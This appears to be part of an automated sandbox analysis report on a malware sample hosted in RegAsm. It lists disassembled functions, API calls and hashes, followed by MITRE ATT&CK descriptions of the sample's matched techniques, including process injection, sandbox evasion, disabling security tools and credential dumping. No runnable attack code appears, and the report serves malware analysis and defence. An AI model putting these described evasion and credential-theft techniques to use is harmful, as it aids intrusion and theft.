Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659

Function 6C023850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C09F860), ref: 6C02385C
ReleaseSRWLockExclusive.KERNEL32(6C09F860,?), ref: 6C023871

Strings

,l, xrefs: 6C02387A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,l
API String ID: 17069307-1987678549
Opcode ID: 8f2c74e243821a4d51b4a1186b5d5fb89643bad53d7b2433311a540cb1bef47d
Instruction ID: e08306ba8b7b61eb3aa89f29d4531d06189deb2e407fc9aa491d4f3c9f427f4c
Opcode Fuzzy Hash: 8f2c74e243821a4d51b4a1186b5d5fb89643bad53d7b2433311a540cb1bef47d
Instruction Fuzzy Hash: 7EE04F31915B18978B119F96940678B7BFCFE4B6A03046106F51A5BA10CB34E94096D6

Function 6C02BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C02BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C02BEF5

Strings

cryptbase.dll, xrefs: 6C02BEF0

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: d431ab5e6fec31244572755611eb884b32968ee9d372c9eb5acfdb26fd00563f
Instruction ID: d0a0d0ef18459b45e0dcab763a19587f70c13ffd11287dc2d4d745c2bcfb9ad4
Opcode Fuzzy Hash: d431ab5e6fec31244572755611eb884b32968ee9d372c9eb5acfdb26fd00563f
Instruction Fuzzy Hash: 98D0C932284208EBDB50AEA18D0AB293BFCA712735F50D025F76A94951CBB5A450DB94

Function 6C0150E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C014E9C,?,?,?,?,?), ref: 6C01510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C014E9C,?,?,?,?,?), ref: 6C015167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C015196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C014E9C), ref: 6C015234

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: d4acb89784ad338e0361a069e05ec76c98b4447b2d885e9f5e1ee6d0840146a3
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 96918C39509616CFCB15CF48C490A5ABBE1BF99318B288688DD585FB15D371FC42CBE0

Function 6C0508F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09E7DC), ref: 6C050918
LeaveCriticalSection.KERNEL32(6C09E7DC), ref: 6C0509A6
EnterCriticalSection.KERNEL32(6C09E7DC,?,00000000), ref: 6C0509F3
LeaveCriticalSection.KERNEL32(6C09E7DC), ref: 6C050ACB

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b5d5adf1f41093d67a3ddda155715897a0fa3363f54b921af8a9b898fa974da3
Instruction ID: 715652db0b2c130b51cc495bcc97b00616519b5c2fbeeb26a19899795e915c67
Opcode Fuzzy Hash: b5d5adf1f41093d67a3ddda155715897a0fa3363f54b921af8a9b898fa974da3
Instruction Fuzzy Hash: 1D51263A709650CBEB049F55C90476E73E5FB82B2CBA4813AD96597F80DB31EC518AC1

Function 6C06B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C06B2C9,?,?,?,6C06B127,?,?,?,?,?,?,?,?,?,6C06AE52), ref: 6C06B628

Part of subcall function 6C0690E0: free.MOZGLUE(?,00000000,?,?,6C06DEDB), ref: 6C0690FF
Part of subcall function 6C0690E0: free.MOZGLUE(?,00000000,?,?,6C06DEDB), ref: 6C069108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C06B2C9,?,?,?,6C06B127,?,?,?,?,?,?,?,?,?,6C06AE52), ref: 6C06B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C06B2C9,?,?,?,6C06B127,?,?,?,?,?,?,?,?,?,6C06AE52), ref: 6C06B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C06B127,?,?,?,?,?,?,?,?), ref: 6C06B74D

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 5378a2b3e658a20da41d835d50119687a13fb63d26c18c9bc1973267e4c75508
Instruction ID: 22d37bd79b7963b6f2c5d4255ef637e782743f34476058407b586b2b90034bb5
Opcode Fuzzy Hash: 5378a2b3e658a20da41d835d50119687a13fb63d26c18c9bc1973267e4c75508
Instruction Fuzzy Hash: 4451E0B1A053158FDB14CF1AC98476EF7F9FF85304F458529E85AABB10DB30A904CBA1

Function 6C06DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C05FF2A), ref: 6C06DFFD

Part of subcall function 6C0690E0: free.MOZGLUE(?,00000000,?,?,6C06DEDB), ref: 6C0690FF
Part of subcall function 6C0690E0: free.MOZGLUE(?,00000000,?,?,6C06DEDB), ref: 6C069108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C05FF2A), ref: 6C06E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C05FF2A), ref: 6C06E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C05FF2A), ref: 6C06E0FE

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 458d0a821cc951543486e4d2657ea71dbbef4f5b57505abdaf703c14c6b0dd74
Instruction ID: d110356209e9787c76482b94d42231c6582293c810d5cb277e68879540454ad3
Opcode Fuzzy Hash: 458d0a821cc951543486e4d2657ea71dbbef4f5b57505abdaf703c14c6b0dd74
Instruction Fuzzy Hash: 3A41ADB16043068BFB14CF69CC8035A73F6AB45708F144939D666DBB40E732E945CB92

Function 6C076180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C0761DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C07622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C076250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C076292

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: ea4c48be180b6d821654e0b7b07d2795382d3af695d90b58e1f11ace5fa94a51
Instruction ID: d7a2d94460bc3007730c28fa1c4ab975945097efa83961eb42467125f4216717
Opcode Fuzzy Hash: ea4c48be180b6d821654e0b7b07d2795382d3af695d90b58e1f11ace5fa94a51
Instruction Fuzzy Hash: C6313771A00A0A8FDB18CF2CDC84BAA73E9FF95308F108139C55AD7651EB31E599C764

Function 6C066E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C066EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C066EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C066F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C066F5C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 945d8580492f19ebe17cbdac63a91ec177474f44c17f10d95f6a2e9326b6875d
Instruction ID: 13e7a5cbc291bf9e0aa40116fdd0ed7793e410bb59dfcfb06e5dcce4ade25975
Opcode Fuzzy Hash: 945d8580492f19ebe17cbdac63a91ec177474f44c17f10d95f6a2e9326b6875d
Instruction Fuzzy Hash: 4131C371A1060A8FDB04CF2DD9807AE73E9FB95344F508639D41AC7A51EF32E659C7A0

Function 6C07B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C020A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C07B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C020A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C07B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C020A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C07B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C020A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C07B67F

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 69c32cbaf8d5f2fb5c2b37c3f61d95d7cb3cf713286fc646eccc604260e7bae2
Instruction ID: 73567b0d5d923ebc7b54cd8d19442cdbd685df02ceb4d7d01981b86889968f4c
Opcode Fuzzy Hash: 69c32cbaf8d5f2fb5c2b37c3f61d95d7cb3cf713286fc646eccc604260e7bae2
Instruction Fuzzy Hash: 003104B1A002168FDB24CF58C84475ABBFAFF84304F568629C9069B301EB35E915CBF4

Function 6C04F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C04F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C04F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C04F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C04F668

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 6429a96a7d35d62e3ec68555f4af51b315488725034a6d3d6dc742822b2f1eaa
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 90312A71A00214AFCB14DF69CCC0B9F7BF9EB88354B18C539EA4A8BB04D631F9458B94

Function 6C02B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C02B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C02B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C02B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C02B9B9

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 0c0e132f6292a5784e37f4dd99998df5a06fd04465eb1aa26e8c8fdcd4dbb92f
Instruction ID: e4119b437da53bfef8de12773cdf7d95c0ba31bad05d9500d672b707669bc621
Opcode Fuzzy Hash: 0c0e132f6292a5784e37f4dd99998df5a06fd04465eb1aa26e8c8fdcd4dbb92f
Instruction Fuzzy Hash: FF114CB1E002059FCB04DF69D8849ABB7F8BF98314B14853AE91AD3701E731A919CAA1

Function 6C0626B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0626C1
free.MOZGLUE(?), ref: 6C0626E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0626FF
free.MOZGLUE ref: 6C06270D

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7d42a6f024fd86bdf71476261b3129dea9b81c65c18420a840a3d087c6916694
Instruction ID: a101861ef2f37cabc691ba75e5d2c09e8225a0b4d9e0318a9814db65b73e57d9
Opcode Fuzzy Hash: 7d42a6f024fd86bdf71476261b3129dea9b81c65c18420a840a3d087c6916694
Instruction Fuzzy Hash: EAF0D1B6B012015BE7009E19E888B4BB3EDAF41258B540035FA1AC3F02E731F918C7A2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

